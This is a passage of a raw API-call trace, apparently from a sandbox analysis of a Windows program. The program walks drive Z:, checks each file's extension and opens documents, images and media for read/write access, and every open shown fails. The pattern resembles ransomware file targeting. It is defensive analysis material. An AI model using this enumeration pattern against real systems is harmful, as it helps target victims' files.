ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x145e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cdbHKY8ircatAsd.mp3", cAlternateFileName="")) returned 1 [0185.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.674] PathFindExtensionW (pszPath="Z:\\cdbHKY8ircatAsd.mp3") returned=".mp3" [0185.683] CreateFileW (lpFileName="Z:\\cdbHKY8ircatAsd.mp3" (normalized: "z:\\cdbhky8ircatasd.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.686] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5a54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EInIzXIEURKe2P.odt", cAlternateFileName="")) returned 1 [0185.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.686] PathFindExtensionW (pszPath="Z:\\EInIzXIEURKe2P.odt") returned=".odt" [0185.691] CreateFileW (lpFileName="Z:\\EInIzXIEURKe2P.odt" (normalized: "z:\\einizxieurke2p.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.693] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfc2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WDBM7MBYaR.mp3", cAlternateFileName="")) returned 1 [0185.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.693] PathFindExtensionW (pszPath="Z:\\WDBM7MBYaR.mp3") returned=".mp3" [0185.698] CreateFileW (lpFileName="Z:\\WDBM7MBYaR.mp3" (normalized: "z:\\wdbm7mbyar.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.700] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x166d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s6tY3yjB6Dh6qgWl.odp", cAlternateFileName="")) returned 1 [0185.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.700] PathFindExtensionW (pszPath="Z:\\s6tY3yjB6Dh6qgWl.odp") returned=".odp" [0185.704] CreateFileW (lpFileName="Z:\\s6tY3yjB6Dh6qgWl.odp" (normalized: "z:\\s6ty3yjb6dh6qgwl.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.705] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17be7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UrfjPtip.xlsx", cAlternateFileName="")) returned 1 [0185.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.705] PathFindExtensionW (pszPath="Z:\\UrfjPtip.xlsx") returned=".xlsx" [0185.711] CreateFileW (lpFileName="Z:\\UrfjPtip.xlsx" (normalized: "z:\\urfjptip.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.712] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbcf0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qllIIB4PUCq.m4a", cAlternateFileName="")) returned 1 [0185.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.712] PathFindExtensionW (pszPath="Z:\\qllIIB4PUCq.m4a") returned=".m4a" [0185.717] CreateFileW (lpFileName="Z:\\qllIIB4PUCq.m4a" (normalized: "z:\\qlliib4pucq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.719] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd729, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ry23qi7rroS58F.m4a", cAlternateFileName="")) returned 1 [0185.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.719] PathFindExtensionW (pszPath="Z:\\ry23qi7rroS58F.m4a") returned=".m4a" [0185.724] CreateFileW (lpFileName="Z:\\ry23qi7rroS58F.m4a" (normalized: "z:\\ry23qi7rros58f.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.725] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11d82, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zl76M0AJ2xe.ppt", cAlternateFileName="")) returned 1 [0185.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.725] PathFindExtensionW (pszPath="Z:\\zl76M0AJ2xe.ppt") returned=".ppt" [0185.730] CreateFileW (lpFileName="Z:\\zl76M0AJ2xe.ppt" (normalized: "z:\\zl76m0aj2xe.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.732] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11bfd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kiZ0JG9WrlZl.ppt", cAlternateFileName="")) returned 1 [0185.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.732] PathFindExtensionW (pszPath="Z:\\kiZ0JG9WrlZl.ppt") returned=".ppt" [0185.738] CreateFileW (lpFileName="Z:\\kiZ0JG9WrlZl.ppt" (normalized: "z:\\kiz0jg9wrlzl.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.743] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="byUWhwwpU4G7YhqN.png", cAlternateFileName="")) returned 1 [0185.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.743] PathFindExtensionW (pszPath="Z:\\byUWhwwpU4G7YhqN.png") returned=".png" [0185.750] CreateFileW (lpFileName="Z:\\byUWhwwpU4G7YhqN.png" (normalized: "z:\\byuwhwwpu4g7yhqn.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.753] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13665, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3lJ1cmsj7wnHDKlL1.xls", cAlternateFileName="")) returned 1 [0185.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.753] PathFindExtensionW (pszPath="Z:\\3lJ1cmsj7wnHDKlL1.xls") returned=".xls" [0185.758] CreateFileW (lpFileName="Z:\\3lJ1cmsj7wnHDKlL1.xls" (normalized: "z:\\3lj1cmsj7wnhdkll1.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.760] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7fbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U2BmDJ.odp", cAlternateFileName="")) returned 1 [0185.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.760] PathFindExtensionW (pszPath="Z:\\U2BmDJ.odp") returned=".odp" [0185.764] CreateFileW (lpFileName="Z:\\U2BmDJ.odp" (normalized: "z:\\u2bmdj.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.766] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd501, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P3XntTjRFtRk.png", cAlternateFileName="")) returned 1 [0185.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.766] PathFindExtensionW (pszPath="Z:\\P3XntTjRFtRk.png") returned=".png" [0185.771] CreateFileW (lpFileName="Z:\\P3XntTjRFtRk.png" (normalized: "z:\\p3xnttjrftrk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.773] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x58a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D2y4L1elku1D.pps", cAlternateFileName="")) returned 1 [0185.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.773] PathFindExtensionW (pszPath="Z:\\D2y4L1elku1D.pps") returned=".pps" [0185.778] CreateFileW (lpFileName="Z:\\D2y4L1elku1D.pps" (normalized: "z:\\d2y4l1elku1d.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.780] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14a5a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bbqSpo4X5l6kKSSGQegr.jpg", cAlternateFileName="")) returned 1 [0185.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.780] PathFindExtensionW (pszPath="Z:\\bbqSpo4X5l6kKSSGQegr.jpg") returned=".jpg" [0185.784] CreateFileW (lpFileName="Z:\\bbqSpo4X5l6kKSSGQegr.jpg" (normalized: "z:\\bbqspo4x5l6kkssgqegr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.785] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13305, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TqvR2yMTxIsft9J01h3.m4a", cAlternateFileName="")) returned 1 [0185.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.785] PathFindExtensionW (pszPath="Z:\\TqvR2yMTxIsft9J01h3.m4a") returned=".m4a" [0185.789] CreateFileW (lpFileName="Z:\\TqvR2yMTxIsft9J01h3.m4a" (normalized: "z:\\tqvr2ymtxisft9j01h3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.791] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26594678, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LtLIcHIqo8.wav", cAlternateFileName="")) returned 1 [0185.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.791] PathFindExtensionW (pszPath="Z:\\LtLIcHIqo8.wav") returned=".wav" [0185.796] CreateFileW (lpFileName="Z:\\LtLIcHIqo8.wav" (normalized: "z:\\ltlichiqo8.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.797] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xaee1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eMZLYEuOXmzJe.avi", cAlternateFileName="")) returned 1 [0185.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.798] PathFindExtensionW (pszPath="Z:\\eMZLYEuOXmzJe.avi") returned=".avi" [0185.802] CreateFileW (lpFileName="Z:\\eMZLYEuOXmzJe.avi" (normalized: "z:\\emzlyeuoxmzje.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.803] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12466, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iVoyxyaCL.doc", cAlternateFileName="")) returned 1 [0185.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.803] PathFindExtensionW (pszPath="Z:\\iVoyxyaCL.doc") returned=".doc" [0185.807] CreateFileW (lpFileName="Z:\\iVoyxyaCL.doc" (normalized: "z:\\ivoyxyacl.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.810] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x798b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yPKKv7fQ4YK.mkv", cAlternateFileName="")) returned 1 [0185.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.810] PathFindExtensionW (pszPath="Z:\\yPKKv7fQ4YK.mkv") returned=".mkv" [0185.815] CreateFileW (lpFileName="Z:\\yPKKv7fQ4YK.mkv" (normalized: "z:\\ypkkv7fq4yk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.817] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe461, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T3PGQZ2VabtjY5.mp4", cAlternateFileName="")) returned 1 [0185.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.817] PathFindExtensionW (pszPath="Z:\\T3PGQZ2VabtjY5.mp4") returned=".mp4" [0185.822] CreateFileW (lpFileName="Z:\\T3PGQZ2VabtjY5.mp4" (normalized: "z:\\t3pgqz2vabtjy5.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.824] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7545, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YMZNKV4.mkv", cAlternateFileName="")) returned 1 [0185.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.824] PathFindExtensionW (pszPath="Z:\\YMZNKV4.mkv") returned=".mkv" [0185.829] CreateFileW (lpFileName="Z:\\YMZNKV4.mkv" (normalized: "z:\\ymznkv4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.831] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11664, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ppEQNd41NzmPglbQ.ppt", cAlternateFileName="")) returned 1 [0185.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.831] PathFindExtensionW (pszPath="Z:\\ppEQNd41NzmPglbQ.ppt") returned=".ppt" [0185.836] CreateFileW 